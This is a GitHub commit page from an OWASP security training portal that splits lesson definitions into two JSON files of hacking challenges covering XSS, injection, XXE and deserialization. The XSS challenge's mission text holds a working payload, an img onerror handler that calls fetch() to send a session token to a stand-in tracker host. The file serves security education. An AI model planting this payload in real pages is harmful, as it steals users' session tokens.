-
Notifications
You must be signed in to change notification settings - Fork 141
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #163 from OWASP/split-second-degree
Split second degree
- Loading branch information
Showing
16 changed files
with
105 additions
and
97 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
74 changes: 0 additions & 74 deletions
74
trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
This file was deleted.
Oops, something went wrong.
40 changes: 40 additions & 0 deletions
40
trainingportal/static/lessons/secondDegreeBlackBelt1/definitions.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
[ | ||
{ | ||
"level":0, | ||
"name":"Second Degree Black Belt - Part 1", | ||
"challenges":[ | ||
{ | ||
"id":"owasp2017misconfig", | ||
"name":"Security Misconfiguration", | ||
"playLink":"", | ||
"description": "owasp2017misconfig.html", | ||
"codeBlockIds":["enforceSafeConfig"], | ||
"mission": "Find the secret file." | ||
}, | ||
{ | ||
"id":"owasp2017sensitive", | ||
"name":"Sensitive Data Exposure", | ||
"description": "owasp2017sensitive.html", | ||
"attackGram":"missingenc.png", | ||
"codeBlockIds":["useStrongDataEncryption"], | ||
"mission": "Login as the test user." | ||
}, | ||
{ | ||
"id":"owasp2017brokenauth", | ||
"name":"Broken Authentication & Broken Access Control", | ||
"description": "owasp2017brokenauth.html", | ||
"attackGram":"missingauthz.png", | ||
"codeBlockIds":["loginBestPractices","principleOfLeastPrivilege","serverSideValidation"], | ||
"mission": "View the chat messages." | ||
}, | ||
{ | ||
"id":"owasp2017xss", | ||
"name":"Cross-Site Scripting", | ||
"description": "owasp2017xss.html", | ||
"attackGram":"xss.png", | ||
"codeBlockIds":["neutralizeOutput","inputAllowListing","requestForgeryPrevention"], | ||
"mission":"Alter the html code of the page by inserting the following tag: <img src=bla onerror=\"fetch('https://xss.tracker?token='+sessionStorage.token)\">" | ||
} | ||
] | ||
} | ||
] |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
32 changes: 32 additions & 0 deletions
32
trainingportal/static/lessons/secondDegreeBlackBelt2/definitions.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
[ | ||
{ | ||
"level":0, | ||
"name":"Second Degree Black Belt - Part 2", | ||
"challenges":[ | ||
{ | ||
"id":"owasp2017injection", | ||
"name":"Injection", | ||
"description": "owasp2017injection.html", | ||
"attackGram":"commandinjection.png", | ||
"codeBlockIds":["parameterizedCommands","inputAllowListing","principleOfLeastPrivilege"], | ||
"mission":"Output the contents of the secret file on internal host 1." | ||
}, | ||
{ | ||
"id":"owasp2017xxe", | ||
"name":"XML External Entities", | ||
"description": "owasp2017xxe.html", | ||
"attackGram":"xxe.png", | ||
"codeBlockIds":["disableXmlExternalEntities","principleOfLeastPrivilege"], | ||
"mission": "Login into the web application hosted on internal host 2." | ||
}, | ||
{ | ||
"id":"owasp2017deserialization", | ||
"name":"Using Components with Known Vulnerabilities & Insecure Deserialization", | ||
"description": "owasp2017deserialization.html", | ||
"attackGram":"deserialization.png", | ||
"codeBlockIds":["enforceSafeDeserialization","keep3rdPartyUpToDate"], | ||
"mission": "Submit a STOP command object." | ||
} | ||
] | ||
} | ||
] |
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters